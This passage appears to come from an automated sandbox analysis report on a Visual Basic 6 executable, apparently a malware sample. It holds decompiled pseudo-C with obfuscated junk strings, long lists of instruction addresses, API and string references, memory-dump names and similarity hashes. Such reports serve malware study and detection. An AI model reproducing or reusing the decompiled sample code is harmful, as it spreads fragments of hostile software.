				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *_t370 =  *_t370 + _t370;
				 *0x470424B0 =  *((intOrPtr*)(0x470424b0)) + _t370;
				 *_t370 =  *_t370 + _t370;
				_t442 = 0x88;
				_t430 = _t370;
				_t469 = ss;
				 *_t429 =  *_t429 + _t429;
				_v97 = _v97 - 0xffff;
				_push(_t469);
				_push(0x88);
				_push(0x88);
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t475;
				L00401420();
				_push(_t430);
				_push(_t459);
				_push(_t452);
				_v113 = _t475;
				_v109 = 0x401238;
				_push( &_v145);
				L00401606();
				_push( &_v145);
				asm("fld1");
				_push(0x88);
				_push(0x88);
				 *_t475 = _t516;
				_push(0x4028ac);
				_push( &_v161);
				L0040160C();
				_push( &_v177);
				L00401606();
				_v221 = 1;
				_v229 = 2;
				_push( &_v161);
				_push( &_v177);
				_push( &_v229);
				_t381 =  &_v193;
				_push(_t381);
				L0040162A();
				_push(_t381);
				L00401612();
				_v281 = _t381;
				_push( &_v193);
				_push( &_v161);
				_push( &_v177);
				_push( &_v145);
				_push(4);
				L00401600();
				_t476 = _t475 + 0x14;
				_t511 = _v281;
				if(_t511 != 0) {
					_v120 = L"Rumorer8";
					_v128 = 8;
					_v152 = 0x35b2bc;
					_v160 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"iWttTKulK1qrU139");
					_push(_v28);
					L004015FA();
					_t476 = _t476 + 0x2c;
				}
				_v36 = 1;
				_v44 = 2;
				_push( &_v44);
				asm("fld1");
				_push(_t442);
				_push(_t442);
				_v193 = _t516;
				asm("fld1");
				_push(_t442);
				_push(_t442);
				 *_t476 = _t516;
				asm("fld1");
				_push(_t442);
				_push(_t442);
				 *_t476 = _t516;
				_push(_t442);
				_push(_t442);
				 *_t476 =  *0x401230;
				L004015EE();
				L004015F4();
				asm("fcomp qword [0x401228]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t511 == 0) {
					_v192 = _v192 & 0x00000000;
				} else {
					_v192 = 1;
				}
				_v180 =  ~_v192;
				L0040164E();
				if(_v180 != 0) {
					if( *0x40c33c != 0) {
						_v196 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v196 = 0x40c33c;
					}
					_v180 =  *_v196;
					_v136 = L"REINHOLTS";
					_v144 = 8;
					_v120 = 0x20;
					_v128 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t399 =  *((intOrPtr*)( *_v180 + 0x38))(_v180, 0x10, 0x10,  &_v44);
					asm("fclex");
					_v184 = _t399;
					if(_v184 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x4026b8);
						_push(_v180);
						_push(_v184);
						L00401654();
						_v200 = _t399;
					}
					_push( &_v44);
					_push( &_v112);
					L00401660();
					_push( &_v112);
					_push( &_v24);
					L00401666();
					L0040164E();
				}
				asm("wait");
				_push(E00408E08);
				_t391 =  &_v24;
				_push(_t391);
				_push(0);
				L00401618();
				L004015E8();
				return _t391;
			}

0x0040169c
0x0040169c
0x0040169c
0x004016a1
0x004016a6
0x004016a8
0x004016aa
0x004016ac
0x004016ae
0x004016b0
0x004016b1
0x004016b3
0x004016b5
0x004016b7
0x004016b8
0x004016b9
0x004016bf
0x004016c0
0x004016c1
0x004016c6
0x004016c8
0x004016ca
0x004016cc
0x004016ce
0x004016d0
0x004016d2
0x004016d4
0x004016d9
0x004016e0
0x004016e1
0x004016e3
0x004016e6
0x004016e7
0x004016e9
0x004016eb
0x004016ed
0x004016ee
0x004016f5
0x004016f6
0x004016f6
0x004016f6
0x004016f8
0x004016f9
0x004016fa
0x004016fb
0x004016fc
0x004016fe
0x00401706
0x00401709
0x0040170a
0x0040170b
0x0040170c
0x00401713
0x00401714
0x00401714
0x00401715
0x00401716
0x00401718
0x0040171e
0x0040171f
0x00401725
0x00401727
0x00401729
0x0040172b
0x0040172d
0x0040172f
0x00401731
0x00401733
0x00401735
0x00401737
0x00401739
0x0040173b
0x0040173d
0x0040173f
0x00401741
0x00401743
0x00401745
0x00401748
0x0040174b
0x0040174d
0x0040174f
0x00401752
0x00401753
0x00401754
0x00401754
0x00401757
0x00401759
0x0040175e
0x0040175f
0x00401760
0x00401762
0x004017cd
0x004017cd
0x004017ce
0x004017cf
0x004017d0
0x00000000
0x00401764
0x00401764
0x004017d3
0x004017d3
0x004017d5
0x004017d7
0x004017d9
0x004017da
0x004017db
0x004017dc
0x004017dd
0x004017de
0x004017df
0x004017e0
0x00000000
0x00401766
0x00401766
0x00401768
0x0040176a
0x0040176b
0x0040176d
0x00401770
0x00401770
0x00401770
0x00401773
0x00401774
0x00401776
0x004017e1
0x004017e1
0x004017e3
0x004017e6
0x00000000
0x00401778
0x00401778
0x004017e7
0x004017e9
0x004017ed
0x004017f4
0x004017f9
0x0040182d
0x0040182f
0x00401831
0x00401833
0x00401834
0x00401835
0x00401836
0x00401838
0x00401839
0x0040183b
0x0040183d
0x0040183f
0x00401841
0x00401843
0x00401848
0x00401849
0x0040184a
0x0040184f
0x00401851
0x004017fb
0x004017fb
0x004017fd
0x004017ff
0x00401800
0x00401802
0x00401807
0x00401808
0x0040180b
0x0040180c
0x0040180d
0x0040180e
0x0040180f
0x00401811
0x00401813
0x00401815
0x00401817
0x00000000
0x00401817
0x0040177a
0x0040177a
0x00401780
0x00401783
0x00401785
0x00401787
0x0040178a
0x0040178c
0x0040178d
0x00401790
0x00401792
0x00401794
0x00401796
0x00401798
0x0040179b
0x0040179c
0x0040179d
0x0040179e
0x004017a2
0x004017a4
0x004017a5
0x004017a5
0x004017a5
0x004017a8
0x00401819
0x00401819
0x00000000
0x004017aa
0x004017aa
0x00401820
0x00401820
0x004017ac
0x004017ac
0x004017ad
0x004017b0
0x0040181a
0x0040181a
0x0040181f
0x00000000
0x004017b2
0x004017b2
0x004017b9
0x004017c1
0x004017c3
0x004017c5
0x004017c7
0x004017c9
0x004017cc
0x00000000
0x004017cc
0x004017b0
0x004017aa
0x004017a8
0x00401778
0x00401776
0x00401764
0x00401854
0x00401857
0x00401858
0x00401859
0x0040185a
0x0040185b
0x00401861
0x00401867
0x00401869
0x0040186c
0x0040186d
0x0040186f
0x00401873
0x00401876
0x0040187b
0x0040187d
0x0040187f
0x00401881
0x00401883
0x00401885
0x00401887
0x0040188a
0x0040188c
0x0040188e
0x00401890
0x00401892
0x00401894
0x00401896
0x00401898
0x0040189b
0x0040189d
0x0040189f
0x004018a1
0x004018a3
0x004018a7
0x004018aa
0x004018ac
0x004018ae
0x004018b0
0x004018b2
0x004018b4
0x004018b6
0x004018b8
0x004018ba
0x004018bc
0x004018c1
0x004018c4
0x004018c5
0x004018ca
0x004018cb
0x004018ce
0x004018d0
0x004018d6
0x004018d8
0x004018d8
0x004018d9
0x004018db
0x004018dd
0x004018df
0x004018e1
0x004018e3
0x004018e5
0x004018e7
0x004018e9
0x004018eb
0x004018ef
0x004018f0
0x004018f1
0x004018f4
0x004018f4
0x004018f4
0x004018f7
0x004018fa
0x00401965
0x00401965
0x00401967
0x00000000
0x004018fc
0x004018fc
0x00401969
0x00401969
0x0040196a
0x0040196a
0x0040196a
0x0040196c
0x00000000
0x00401900
0x00401900
0x00401901
0x00401903
0x00401905
0x00401905
0x00401905
0x00401908
0x0040196d
0x00401970
0x00401971
0x00401971
0x00401974
0x0040194d
0x0040194f
0x00401951
0x00401953
0x00401956
0x00401958
0x0040195a
0x0040195c
0x0040195d
0x0040195e
0x0040195f
0x00401963
0x00000000
0x00401963
0x00401976
0x00000000
0x0040190a
0x0040190a
0x00401979
0x00401979
0x0040197b
0x00000000
0x0040190c
0x0040190c
0x0040197d
0x0040197d
0x0040197f
0x00401981
0x00401983
0x00000000
0x0040190e
0x0040190e
0x0040190f
0x00401985
0x00401985
0x00401987
0x00401989
0x0040198b
0x00401991
0x00401993
0x00401995
0x00401997
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019a1
0x004019a3
0x004019a5
0x004019a6
0x004019a8
0x004019aa
0x004019ac
0x004019ad
0x004019ae
0x004019af
0x004019b6
0x004019b8
0x004019ba
0x004019bb
0x004019bd
0x004019bf
0x004019c1
0x004019c3
0x004019c5
0x004019c7
0x004019c9
0x004019cb
0x004019d2
0x004019d3
0x004019d5
0x004019d7
0x004019d9
0x004019dd
0x004019df
0x004019e1
0x004019e3
0x004019e5
0x004019e7
0x004019ea
0x004019eb
0x004019ed
0x004019ef
0x004019f3
0x00000000
0x004019f3
0x00401911
0x00401911
0x00401914
0x00401915
0x00401917
0x0040191b
0x0040191d
0x0040191d
0x0040191f
0x00401920
0x00401921
0x00401922
0x00401923
0x00401924
0x00401925
0x004019f4
0x004019f4
0x004019f6
0x004019fa
0x004019fb
0x004019fd
0x004019ff
0x00401a02
0x00401a02
0x0040190f
0x0040190c
0x0040190a
0x00401908
0x004018fc
0x00401a03
0x00401a05
0x00401a07
0x00401a09
0x00401a0c
0x00401a0e
0x00401a12
0x00401a13
0x00401a15
0x00401a1b
0x00401a22
0x00401a23
0x00401a25
0x00401a27
0x00401a29
0x00401a2a
0x00401a2f
0x00401a36
0x00401a38
0x00401a3a
0x00401a3c
0x00401a3d
0x00401a3f
0x00401a41
0x00401a43
0x00401a45
0x00401a47
0x00401a49
0x00401a4b
0x00401a52
0x00401a57
0x00401a59
0x00401a5b
0x00401a5e
0x00401a5f
0x00401a61
0x00401a63
0x00401a6a
0x00401a6c
0x00401a6e
0x00401a70
0x00401a72
0x00401a74
0x00401a79
0x00401a7a
0x00401a7f
0x00401a81
0x00401a83
0x00401a85
0x00401a87
0x00401a8b
0x00401a93
0x00401a99
0x00401a9a
0x00401a9b
0x00401a9d
0x00401a9f
0x00401aa1
0x00401aa3
0x00401aa5
0x00401aa7
0x00401aa9
0x00401aab
0x00401aad
0x00401aaf
0x00401ab1
0x00401ab3
0x00401ab5
0x00401ab7
0x00401ab9
0x00401abb
0x00401abd
0x00401abf
0x00401ac1
0x00401ac3
0x00401ac5
0x00401ac7
0x00401ac9
0x00401acb
0x00401acd
0x00401acf
0x00401ad1
0x00401ad3
0x00401ad5
0x00401ad7
0x00401ad9
0x00401adb
0x00401add
0x00401adf
0x00401ae1
0x00401ae3
0x00401ae7
0x00401aef
0x00401af5
0x00401af6
0x00401af7
0x00401af9
0x00401afb
0x00401afd
0x00401aff
0x00401b01
0x00401b03
0x00401b05
0x00401b07
0x00401b09
0x00401b0b
0x00401b0d
0x00401b0f
0x00401b11
0x00401b13
0x00401b15
0x00401b17
0x00401b19
0x00401b1b
0x00401b1d
0x00401b1f
0x00401b21
0x00401b23
0x00401b25
0x00401b27
0x00401b29
0x00401b2b
0x00401b2d
0x00401b2f
0x00401b31
0x00401b33
0x00401b35
0x00401b37
0x00401b39
0x00401b3b
0x00401b3d
0x00401b3f
0x00401b41
0x00401b43
0x00401b45
0x00401b47
0x00401b49
0x00401b4b
0x00401b4d
0x00401b4f
0x00401b51
0x00401b53
0x00401b55
0x00401b57
0x00401b59
0x00401b5b
0x00401b5d
0x00401b5f
0x00401b61
0x00401b63
0x00401b65
0x00401b67
0x00401b69
0x00401b6b
0x00401b6d
0x00401b6f
0x00401b71
0x00401b73
0x00401b75
0x00401b77
0x00401b79
0x00401b7c
0x00401b7e
0x00401b85
0x00401b87
0x00401b8e
0x00401b8f
0x00401b91
0x00401b93
0x00401b95
0x00401b99
0x00401b9b
0x00401b9d
0x00401b9f
0x00401ba1
0x00401ba3
0x00401ba5
0x00401ba7
0x00401ba9
0x00401bab
0x00401bad
0x00401baf
0x00401bb1
0x00401bb3
0x00401bb5
0x00401bb7
0x00401bb9
0x00401bbb
0x00401bbd
0x00401bbf
0x00401bc1
0x00401bc3
0x00401bc5
0x00401bc7
0x00401bc9
0x00401bcb
0x00401bcd
0x00401bcf
0x00401bd1
0x00401bd3
0x00401bd5
0x00401bd7
0x00401bd9
0x00401bdb
0x00401bdd
0x00401bdf
0x00401be1
0x00401be3
0x00401be5
0x00401be7
0x00401be9
0x00401beb
0x00401bed
0x00401bef
0x00401bf1
0x00401bf3
0x00401bf5
0x00401bf7
0x00401bf9
0x00401bfb
0x00401bfd
0x00401bff
0x00401c01
0x00401c03
0x00401c05
0x00401c07
0x00401c09
0x00401c0b
0x00401c0d
0x00401c0f
0x00401c11
0x00401c13
0x00401c15
0x00401c17
0x00401c19
0x00401c1b
0x00401c1d
0x00401c1f
0x00401c21
0x00401c23
0x00401c25
0x00401c27
0x00401c29
0x00401c2b
0x00401c2d
0x00401c2f
0x00401c31
0x00401c33
0x00401c35
0x00401c37
0x00401c39
0x00401c3b
0x00401c3d
0x00401c3f
0x00401c41
0x00401c43
0x00401c45
0x00401c47
0x00401c49
0x00401c4b
0x00401c4d
0x00401c4f
0x00401c51
0x00401c53
0x00401c55
0x00401c57
0x00401c59
0x00401c5b
0x00401c5d
0x00401c5f
0x00401c61
0x00401c63
0x00401c65
0x00401c67
0x00401c69
0x00401c6b
0x00401c6d
0x00401c6f
0x00401c71
0x00401c73
0x00401c75
0x00401c77
0x00401c79
0x00401c7b
0x00401c7d
0x00401c7f
0x00401c81
0x00401c83
0x00401c85
0x00401c87
0x00401c89
0x00401c8b
0x00401c8d
0x00401c8f
0x00401c91
0x00401c93
0x00401c95
0x00401c97
0x00401c99
0x00401c9b
0x00401c9d
0x00401c9f
0x00401ca1
0x00401ca3
0x00401ca5
0x00401ca7
0x00401ca9
0x00401cab
0x00401cad
0x00401caf
0x00401cb1
0x00401cb3
0x00401cb5
0x00401cb7
0x00401cb9
0x00401cbb
0x00401cbd
0x00401cbf
0x00401cc1
0x00401cc3
0x00401cc5
0x00401cc7
0x00401cc9
0x00401ccb
0x00401ccd
0x00401ccf
0x00401cd1
0x00401cd3
0x00401cd5
0x00401cd7
0x00401cd9
0x00401cdb
0x00401cdd
0x00401cdf
0x00401ce1
0x00401ce3
0x00401ce5
0x00401ce7
0x00401ce9
0x00401ceb
0x00401ced
0x00401cef
0x00401cf1
0x00401cf3
0x00401cf5
0x00401cf7
0x00401cf9
0x00401cfb
0x00401cfd
0x00401cff
0x00401d01
0x00401d03
0x00401d05
0x00401d07
0x00401d09
0x00401d0b
0x00401d0d
0x00401d0f
0x00401d11
0x00401d13
0x00401d15
0x00401d17
0x00401d19
0x00401d1b
0x00401d1d
0x00401d1f
0x00401d21
0x00401d23
0x00401d25
0x00401d27
0x00401d29
0x00401d2b
0x00401d2d
0x00401d2f
0x00401d31
0x00401d33
0x00401d35
0x00401d37
0x00401d39
0x00401d3b
0x00401d3d
0x00401d3f
0x00401d41
0x00401d43
0x00401d45
0x00401d47
0x00401d49
0x00401d4b
0x00401d4d
0x00401d4f
0x00401d51
0x00401d53
0x00401d55
0x00401d57
0x00401d59
0x00401d5b
0x00401d5d
0x00401d5f
0x00401d61
0x00401d63
0x00401d65
0x00401d67
0x00401d69
0x00401d6b
0x00401d6d
0x00401d6f
0x00401d71
0x00401d73
0x00401d75
0x00401d77
0x00401d79
0x00401d7b
0x00401d7d
0x00401d7f
0x00401d81
0x00401d83
0x00401d85
0x00401d87
0x00401d89
0x00401d8b
0x00401d8d
0x00401d8f
0x00401d91
0x00401d93
0x00401d95
0x00401d97
0x00401d99
0x00401d9b
0x00401d9d
0x00401d9f
0x00401da1
0x00401da3
0x00401da5
0x00401da7
0x00401dab
0x00401dad
0x00401daf
0x00401db1
0x00401db3
0x00401db5
0x00401db8
0x00401dba
0x00401dc0
0x00401dc2
0x00401dc4
0x00401dc6
0x00401dca
0x00401dcb
0x00401dcd
0x00401dd1
0x00401dd3
0x00401dd6
0x00401dd7
0x00401dd9
0x00401ddb
0x00401ddd
0x00401ddf
0x00401de1
0x00401de3
0x00401de5
0x00401de6
0x00401de7
0x00401de9
0x00401deb
0x00401def
0x00401df1
0x00401df3
0x00401df5
0x00401df6
0x00401df7
0x00401df9
0x00401dfb
0x00401dfd
0x00401dfe
0x00401dff
0x00401e01
0x00401e03
0x00401e06
0x00401e07
0x00401e09
0x00401e0b
0x00401e0e
0x00401e0f
0x00401e11
0x00401e17
0x00401e19
0x00401e1a
0x00401e1b
0x00401e1d
0x00401e20
0x00401e22
0x00401e24
0x00401e27
0x00401e2e
0x00401e2f
0x00401e32
0x00401e34
0x00401e36
0x00401e38
0x00401e39
0x00401e3b
0x00401e3d
0x00401e3f
0x00401e41
0x00401e43
0x00401e45
0x00401e47
0x00401e4b
0x00401e51
0x00401e53
0x00401e55
0x00401e57
0x00401e5a
0x00401e5e
0x00401e60
0x00401e61
0x00401e63
0x00401e65
0x00401e67
0x00401e69
0x00401e6b
0x00401e6d
0x00401e71
0x00401e72
0x00401e73
0x00401e80
0x00401e81
0x00401e87
0x00401e8b
0x00401e91
0x00401e93
0x00401e95
0x00401e97
0x00401e9a
0x00401e9b
0x00401ea8
0x00401ea9
0x00401eab
0x00401eae
0x00401eb6
0x00401eb8
0x00401eba
0x00401ebc
0x00401ebe
0x00401ec0
0x00401ec5
0x00401ec6
0x00401ecb
0x00401ecd
0x00401ecf
0x00401ed2
0x00401ed4
0x00401ed5
0x00401ed7
0x00401edb
0x00401ede
0x00401ee0
0x00401ee2
0x00401ee4
0x00401ee6
0x00401ee8
0x00401ee9
0x00401eec
0x00401ef0
0x00401f17
0x00401f17
0x00401f1e
0x00401f20
0x00401f20
0x00401ef2
0x00401ef3
0x00401ef8
0x00401ef9
0x00401efb
0x00401efe
0x00401f06
0x00401f08
0x00401f0a
0x00401f0c
0x00401f0e
0x00401f10
0x00401f15
0x00401f16
0x00000000
0x00401f16
0x00401f33
0x00401f3e
0x00401f3f
0x00401f44
0x00401f48
0x00401f50
0x00401f52
0x00401f53
0x00401f5b
0x00401f5f
0x00401f68
0x00401f6c
0x00401f6e
0x00401f6f
0x00401f75
0x00401f78
0x00401f7d
0x00401f7f
0x00401f81
0x00401f82
0x00401f83
0x00401f89
0x00401f8a
0x00401f8b
0x00401f8b
0x00401f91
0x00401f92
0x00401f93
0x00401f95
0x00401f97
0x00401f99
0x00401f9b
0x00401f9d
0x00401f9f
0x00401fa1
0x00401fa3
0x00401fa5
0x00401fa7
0x00401fa9
0x00401fab
0x00401fad
0x00401faf
0x00401fb1
0x00401fb3
0x00401fb5
0x00401fb7
0x00401fb9
0x00401fbb
0x00401fbd
0x00401fbf
0x00401fc1
0x00401fc3
0x00401fc5
0x00401fc7
0x00401fc9
0x00401fcb
0x00401fcd
0x00401fcf
0x00401fd1
0x00401fd3
0x00401fd5
0x00401fd7
0x00401fd9
0x00401fdb
0x00401fde
0x00401fdf
0x00401fe5
0x00401fe7
0x00401fed
0x00401fee
0x00401fef
0x00401ff1
0x00401ff3
0x00401ff5
0x00401ff7
0x00401ff9
0x00401ffb
0x00401ffd
0x00401fff
0x00402001
0x00402003
0x00402005
0x00402007
0x00402009
0x0040200b
0x0040200d
0x0040200f
0x00402011
0x00402013
0x00402015
0x00402017
0x00402019
0x0040201b
0x0040201d
0x0040201f
0x00402021
0x00402023
0x00402025
0x00402027
0x00402029
0x0040202b
0x0040202d
0x0040202f
0x00402031
0x00402033
0x00402035
0x00402037
0x0040203d
0x00402043
0x00402049
0x0040204a
0x0040204b
0x0040204d
0x0040204f
0x00402051
0x00402053
0x00402055
0x00402057
0x00402059
0x0040205b
0x0040205d
0x0040205f
0x00402061
0x00402063
0x00402065
0x00402067
0x00402069
0x0040206b
0x0040206d
0x0040206f
0x00402071
0x00402073
0x00402075
0x00402077
0x00402079
0x0040207b
0x0040207d
0x0040207f
0x00402081
0x00402083
0x00402089
0x0040208f
0x00402095
0x00402096
0x00402097
0x00402099
0x0040209b
0x0040209d
0x0040209f
0x004020a1
0x004020a3
0x004020a5
0x004020a7
0x004020a9
0x004020ab
0x004020ad
0x004020af
0x004020b1
0x004020b3
0x004020b5
0x004020b7
0x004020b9
0x004020bb
0x004020bd
0x004020bf
0x004020c1
0x004020c3
0x004020c5
0x004020c7
0x004020c9
0x004020cb
0x004020cd
0x004020cf
0x004020d1
0x004020d3
0x004020d5
0x004020d7
0x004020d9
0x004020db
0x004020dd
0x004020df
0x004020e1
0x004020e3
0x004020e5
0x004020e7
0x004020e9
0x004020eb
0x004020ed
0x004020ef
0x004020f1
0x004020f3
0x004020f5
0x004020f7
0x004020f9
0x004020fd
0x004020fe
0x004020ff
0x00402105
0x00402107
0x0040210d
0x0040210e
0x0040210f
0x00402111
0x00402113
0x00402115
0x00402117
0x00402119
0x0040211b
0x0040211d
0x0040211f
0x00402121
0x00402123
0x00402125
0x00402127
0x00402129
0x0040212b
0x0040212d
0x0040212f
0x00402131
0x00402133
0x00402135
0x00402137
0x00402139
0x0040213b
0x0040213d
0x0040213f
0x00402141
0x00402143
0x00402145
0x00402147
0x00402149
0x0040214b
0x0040214d
0x0040214f
0x00402151
0x00402153
0x00402155
0x00402157
0x00402159
0x0040215b
0x0040215d
0x0040215f
0x00402161
0x00402163
0x00402165
0x00402167
0x00402169
0x0040216b
0x0040216d
0x0040216f
0x00402171
0x00402175
0x00402176
0x00402177
0x0040217d
0x0040217f
0x00402186
0x00402187
0x00402189
0x0040218b
0x0040218d
0x0040218f
0x00402191
0x00402193
0x00402195
0x00402197
0x00402199
0x0040219b
0x0040219d
0x0040219f
0x004021a1
0x004021a3
0x004021a5
0x004021a7
0x004021a9
0x004021ab
0x004021ad
0x004021af
0x004021b1
0x004021b3
0x004021b5
0x004021b7
0x004021b9
0x004021bb
0x004021bd
0x004021bf
0x004021c1
0x004021c3
0x004021c5
0x004021c7
0x004021c9
0x004021cb
0x004021cd
0x004021cf
0x004021d1
0x004021d3
0x004021d5
0x004021d7
0x004021d9
0x004021db
0x004021dd
0x004021df
0x004021e2
0x004021e3
0x004021e5
0x004021e7
0x004021e9
0x004021eb
0x004021ed
0x004021ef
0x004021f1
0x004021f3
0x004021f5
0x004021f7
0x004021f9
0x004021fb
0x004021fd
0x004021ff
0x00402201
0x00402203
0x00402209
0x0040220b
0x0040220d
0x0040220e
0x0040220f
0x00402211
0x00408b48
0x00408b4b
0x00408b4c
0x00408b4d
0x00408b58
0x00408b59
0x00408b65
0x00408b6a
0x00408b6b
0x00408b6c
0x00408b6d
0x00408b70
0x00408b7a
0x00408b7b
0x00408b83
0x00408b84
0x00408b86
0x00408b87
0x00408b88
0x00408b8b
0x00408b93
0x00408b94
0x00408b9c
0x00408b9d
0x00408ba2
0x00408ba9
0x00408bb3
0x00408bb7
0x00408bbb
0x00408bbc
0x00408bbf
0x00408bc0
0x00408bc5
0x00408bc6
0x00408bcb
0x00408bd5
0x00408bd9
0x00408bdd
0x00408be1
0x00408be2
0x00408be4
0x00408be9
0x00408bf3
0x00408bf5
0x00408bf7
0x00408bfe
0x00408c05
0x00408c0f
0x00408c19
0x00408c1c
0x00408c26
0x00408c27
0x00408c28
0x00408c29
0x00408c2a
0x00408c2d
0x00408c3a
0x00408c3b
0x00408c3c
0x00408c3d
0x00408c3e
0x00408c40
0x00408c45
0x00408c48
0x00408c4d
0x00408c4d
0x00408c50
0x00408c57
0x00408c61
0x00408c62
0x00408c64
0x00408c65
0x00408c66
0x00408c69
0x00408c6b
0x00408c6c
0x00408c6d
0x00408c70
0x00408c72
0x00408c73
0x00408c74
0x00408c7d
0x00408c7e
0x00408c7f
0x00408c82
0x00408c87
0x00408c8c
0x00408c92
0x00408c94
0x00408c95
0x00408ca3
0x00408c97
0x00408c97
0x00408c97
0x00408cb2
0x00408cbc
0x00408cca
0x00408cd7
0x00408cf4
0x00408cd9
0x00408cd9
0x00408cde
0x00408ce3
0x00408ce8
0x00408ce8
0x00408d06
0x00408d0c
0x00408d16
0x00408d20
0x00408d27
0x00408d35
0x00408d42
0x00408d43
0x00408d44
0x00408d45
0x00408d49
0x00408d53
0x00408d54
0x00408d55
0x00408d56
0x00408d65
0x00408d68
0x00408d6a
0x00408d77
0x00408d99
0x00408d79
0x00408d79
0x00408d7b
0x00408d80
0x00408d86
0x00408d8c
0x00408d91
0x00408d91
0x00408da3
0x00408da7
0x00408da8
0x00408db0
0x00408db4
0x00408db5
0x00408dbd
0x00408dbd
0x00408dc2
0x00408dc3
0x00408df4
0x00408df7
0x00408df8
0x00408dfa
0x00408e02
0x00408e07

APIs

#100.MSVBVM60(VB5!6&*), ref: 004016A1

Strings

VB5!6&*, xrefs: 0040169C

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: ffae48eafd2369c22e728d208bf8751d2e7ee4d85bc2b698f44c95629d84ad94
Instruction ID: 471c53d66c796f815201a8713e6aaa00376b33ca269beba2083cb6a2e731c14d
Opcode Fuzzy Hash: ffae48eafd2369c22e728d208bf8751d2e7ee4d85bc2b698f44c95629d84ad94
Instruction Fuzzy Hash: 4861576240E7C05FD7175B708EA95A17FB4EE2322430A42EBC8C2CF4B3D66C594AC766

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409C6C, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00409C6C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				signed int _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				signed char _v188;
				signed int _v192;
				signed char _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				signed int _v220;
				signed int _t80;
				char* _t91;
				signed char _t99;
				char* _t107;
				void* _t114;
				void* _t116;
				intOrPtr _t117;
				intOrPtr* _t118;
				signed long long _t122;

				_t117 = _t116 - 0xc;
				 *[fs:0x0] = _t117;
				L00401420();
				_v16 = _t117;
				_v12 = 0x401348;
				_v8 = 0;
				_t80 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t114);
				L0040163C();
				_push(0x402a84);
				L0040153A();
				_push(_t80);
				L00401540();
				L00401678();
				_push(_t80);
				_push(0x402a94);
				L0040167E();
				asm("sbb eax, eax");
				_v188 =  ~( ~( ~_t80));
				L0040166C();
				if(_v188 != 0) {
					if( *0x40c33c != 0) {
						_v204 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026c8);
						L0040165A();
						_v204 = 0x40c33c;
					}
					_v204 =  *_v204;
					_v188 =  *_v204;
					__eax =  &_v56;
					L0040152E();
					__esp = __esp + 0x10;
					L00401534();
					__eax =  &_v40;
					L00401582();
					_v188 =  *_v188;
					__eax =  *((intOrPtr*)( *_v188 + 0xc))(_v188, __eax, __eax, __eax, __eax, __eax, _v32, L"CYtZi0nszoU4nj128", 0);
					asm("fclex");
					_v192 = __eax;
					if(_v192 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x4026b8);
						_push(_v188);
						_push(_v192);
						L00401654();
						_v208 = __eax;
					}
					L004015E8();
					L0040164E();
				}
				_v96 = 5;
				_v104 = 2;
				_v80 = 0x63;
				_v88 = 2;
				_t36 =  &_v64;
				 *_t36 = _v64 & 0x00000000;
				_v72 = 2;
				_v48 = 0x64;
				_v56 = 2;
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push( &_v56);
				_push( &_v120);
				L0040151C();
				_push( &_v120);
				_t91 =  &_v36;
				_push(_t91);
				L00401522();
				_push(_t91);
				L00401528();
				L004015F4();
				asm("fcomp qword [0x401340]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t36 == 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_v212 = 1;
				}
				_v188 =  ~_v212;
				_t107 =  &_v36;
				L0040166C();
				_push( &_v120);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push( &_v56);
				_push(5);
				L00401600();
				_t118 = _t117 + 0x18;
				_t99 = _v188;
				if(_t99 != 0) {
					_push(_t107);
					 *_t118 =  *0x401338;
					_t122 =  *0x401330 *  *0x401328;
					if( *0x40c000 != 0) {
						_push( *0x401294);
						_push( *0x401290);
						L00401444();
					} else {
						_t122 = _t122 /  *0x401290;
					}
					asm("fnstsw ax");
					if((_t99 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v216 = _t122;
					_v104 = _v216;
					 *_t118 =  *0x401320;
					L00401516();
					 *_t118 =  *0x401310;
					_v120 =  *0x40130c;
					 *_t118 =  *0x401308;
					_t99 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t107, _t107, _t107, _t99, _t107, _t107);
					asm("fclex");
					_v188 = _t99;
					if(_v188 >= 0) {
						_v220 = _v220 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x40246c);
						_push(_a4);
						_push(_v188);
						L00401654();
						_v220 = _t99;
					}
